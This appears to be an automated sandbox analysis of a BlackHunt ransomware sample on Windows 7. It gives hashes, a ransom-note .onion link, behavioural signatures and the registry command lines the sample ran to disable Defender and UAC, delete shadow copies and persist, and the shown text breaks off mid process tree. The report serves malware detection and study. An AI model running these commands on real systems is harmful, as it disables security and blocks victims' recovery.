Analysis
-
max time kernel
210s -
max time network
159s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19/01/2024, 01:30
Static task
static1
Behavioral task
behavioral1
Sample
fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
Resource
win10v2004-20231215-en
General
-
Target
fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe
-
Size
707KB
-
MD5
9f9ec6ddfa7450732ba4935648f34311
-
SHA1
1cc97e28ecc0622db4eaa3e2bc5e246624b8c342
-
SHA256
fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9
-
SHA512
4ac8ce1e613d06ee64e7f4730cab082df67aecf2ead8a1377688a50c6e778dbdd0a848bf80bc8e115582c9459776b5948dc5689440833aeee689b9a504411f84
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1y8Nvnh:6uaTmkZJ+naie5OTamgEoKxLWp5h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 556 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2436 bcdedit.exe 2004 bcdedit.exe -
Renames multiple (103) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2380 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened (read-only) \??\W: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened (read-only) \??\P: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened (read-only) \??\K: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened (read-only) \??\V: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened (read-only) \??\H: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened (read-only) \??\Z: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened (read-only) \??\Q: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened (read-only) \??\Y: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened (read-only) \??\O: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened (read-only) \??\J: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened (read-only) \??\X: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened (read-only) \??\G: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened (read-only) \??\L: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened (read-only) \??\I: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened (read-only) \??\A: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened (read-only) \??\N: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened (read-only) \??\U: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened (read-only) \??\M: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened (read-only) \??\R: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened (read-only) \??\T: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened (read-only) \??\S: fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened (read-only) \??\F: vssadmin.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\7-Zip\#BlackHunt_Private.key fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File created C:\Program Files\DVD Maker\ja-JP\#BlackHunt_ReadMe.hta fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\DenyCompress.wax fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\#BlackHunt_Private.key fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\mng2.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File created C:\Program Files\DVD Maker\fr-FR\#BlackHunt_Private.key fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\va.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\mk.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File created C:\Program Files\DVD Maker\ja-JP\#BlackHunt_ReadMe.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\sq.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\ru.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File created C:\Program Files\DVD Maker\Shared\#BlackHunt_Private.key fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File created C:\Program Files\DVD Maker\de-DE\#BlackHunt_Private.key fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\7zCon.sfx fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\da.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\fr.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\ka.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\pt-br.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground.wmv fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\uz-cyrl.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\#BlackHunt_ReadMe.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\ca.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\ja.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\lt.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\lv.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\mn.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\uz.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File created C:\Program Files\DVD Maker\#BlackHunt_ReadMe.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\ext.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\ga.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\he.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\nb.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\ps.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\pa-in.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File created C:\Program Files\#BlackHunt_ReadMe.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File created C:\Program Files\7-Zip\Lang\#BlackHunt_ReadMe.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File created C:\Program Files\DVD Maker\de-DE\#BlackHunt_ReadMe.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\is.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\kk.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File created C:\Program Files\DVD Maker\it-IT\#BlackHunt_ReadMe.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\sr-spl.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\readme.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\#BlackHunt_Private.key fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\History.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\bn.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_VideoInset.png fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\7-zip.chm fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\sk.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\DVD Maker\rtstreamsink.ax fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\#BlackHunt_ReadMe.hta fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\br.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\ku-ckb.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\ku.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\sl.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File created C:\Program Files\#BlackHunt_Private.key fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\gu.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\ug.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File created C:\Program Files\7-Zip\Lang\#BlackHunt_ReadMe.hta fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\kab.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\sv.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\sr-spc.txt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\DVD Maker\Shared\DissolveAnother.png fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\#BlackHunt_ReadMe.hta fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe File opened for modification C:\Program Files\7-Zip\Lang\en.ttt fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2864 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1448 vssadmin.exe 1824 vssadmin.exe 2508 vssadmin.exe 1752 vssadmin.exe 2304 vssadmin.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe Token: SeRestorePrivilege 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe Token: SeBackupPrivilege 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe Token: SeTakeOwnershipPrivilege 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe Token: SeAuditPrivilege 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe Token: SeSecurityPrivilege 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe Token: SeIncBasePriorityPrivilege 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe Token: SeBackupPrivilege 2024 vssvc.exe Token: SeRestorePrivilege 2024 vssvc.exe Token: SeAuditPrivilege 2024 vssvc.exe Token: SeBackupPrivilege 2208 wbengine.exe Token: SeRestorePrivilege 2208 wbengine.exe Token: SeSecurityPrivilege 2208 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2560 wrote to memory of 1108 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 29 PID 2560 wrote to memory of 1108 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 29 PID 2560 wrote to memory of 1108 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 29 PID 2560 wrote to memory of 1108 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 29 PID 2560 wrote to memory of 1184 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 30 PID 2560 wrote to memory of 1184 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 30 PID 2560 wrote to memory of 1184 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 30 PID 2560 wrote to memory of 1184 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 30 PID 2560 wrote to memory of 1940 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 31 PID 2560 wrote to memory of 1940 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 31 PID 2560 wrote to memory of 1940 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 31 PID 2560 wrote to memory of 1940 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 31 PID 2560 wrote to memory of 1696 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 33 PID 2560 wrote to memory of 1696 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 33 PID 2560 wrote to memory of 1696 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 33 PID 2560 wrote to memory of 1696 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 33 PID 2560 wrote to memory of 1436 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 34 PID 2560 wrote to memory of 1436 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 34 PID 2560 wrote to memory of 1436 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 34 PID 2560 wrote to memory of 1436 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 34 PID 2560 wrote to memory of 880 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 38 PID 2560 wrote to memory of 880 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 38 PID 2560 wrote to memory of 880 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 38 PID 2560 wrote to memory of 880 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 38 PID 2560 wrote to memory of 664 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 39 PID 2560 wrote to memory of 664 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 39 PID 2560 wrote to memory of 664 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 39 PID 2560 wrote to memory of 664 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 39 PID 2560 wrote to memory of 548 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 40 PID 2560 wrote to memory of 548 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 40 PID 2560 wrote to memory of 548 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 40 PID 2560 wrote to memory of 548 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 40 PID 2560 wrote to memory of 988 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 41 PID 2560 wrote to memory of 988 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 41 PID 2560 wrote to memory of 988 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 41 PID 2560 wrote to memory of 988 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 41 PID 2560 wrote to memory of 1472 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 43 PID 2560 wrote to memory of 1472 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 43 PID 2560 wrote to memory of 1472 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 43 PID 2560 wrote to memory of 1472 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 43 PID 2560 wrote to memory of 924 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 44 PID 2560 wrote to memory of 924 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 44 PID 2560 wrote to memory of 924 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 44 PID 2560 wrote to memory of 924 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 44 PID 2560 wrote to memory of 1984 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 46 PID 2560 wrote to memory of 1984 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 46 PID 2560 wrote to memory of 1984 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 46 PID 2560 wrote to memory of 1984 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 46 PID 2560 wrote to memory of 1000 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 47 PID 2560 wrote to memory of 1000 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 47 PID 2560 wrote to memory of 1000 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 47 PID 2560 wrote to memory of 1000 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 47 PID 2560 wrote to memory of 1036 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 48 PID 2560 wrote to memory of 1036 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 48 PID 2560 wrote to memory of 1036 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 48 PID 2560 wrote to memory of 1036 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 48 PID 2560 wrote to memory of 1280 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 51 PID 2560 wrote to memory of 1280 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 51 PID 2560 wrote to memory of 1280 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 51 PID 2560 wrote to memory of 1280 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 51 PID 2560 wrote to memory of 2512 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 52 PID 2560 wrote to memory of 2512 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 52 PID 2560 wrote to memory of 2512 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 52 PID 2560 wrote to memory of 2512 2560 fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe 52 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe"C:\Users\Admin\AppData\Local\Temp\fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2560 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵PID:1108
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:1184
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:1940
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:1696
-
